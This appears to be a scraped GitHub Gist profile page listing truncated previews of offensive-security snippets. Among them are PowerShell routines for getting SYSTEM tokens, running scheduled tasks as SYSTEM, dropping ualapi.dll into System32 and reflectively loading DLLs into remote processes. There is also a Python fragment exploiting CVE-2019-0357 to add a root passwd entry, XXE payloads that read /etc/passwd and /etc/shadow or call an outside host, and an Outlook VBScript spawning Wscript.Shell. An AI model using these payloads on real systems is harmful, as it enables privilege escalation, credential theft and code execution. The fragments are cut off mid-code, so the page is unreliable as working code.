Skip to content

Instantly share code, notes, and snippets.

View S3cur3Th1sSh1t's full-sized avatar


View GitHub Profile
function GetWinLogonTokenSystem
function reflectbin
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
function Ualapi
Write-Host "Dropping ualapi.dll in System32 Folder..."
if ([Environment]::Is64BitProcess)
This file has been truncated, but you can view the full file.
function reflectit
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.
1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
$confirmpreference = "none"
function Get-ScheduledTaskSystem
$Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})
$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
S3cur3Th1sSh1t / CVE-2019-0357 - SAP-HANA root
Created February 6, 2020 08:04
CVE-2019-0357 - SAP-HANA root privesc vuln
import os
import signal
import sys
ATTEMPTS = (100 * 1000)
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key):
self.key = key
def decrypt(self, iv, data):
self.cipher =, AES.MODE_CBC, iv)
return self.cipher.decrypt(data)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script id=clientEventHandlersVBS language=vbscript>
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
S3cur3Th1sSh1t / PowerView-3.0-tricks.ps1
Created June 30, 2017 07:00 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set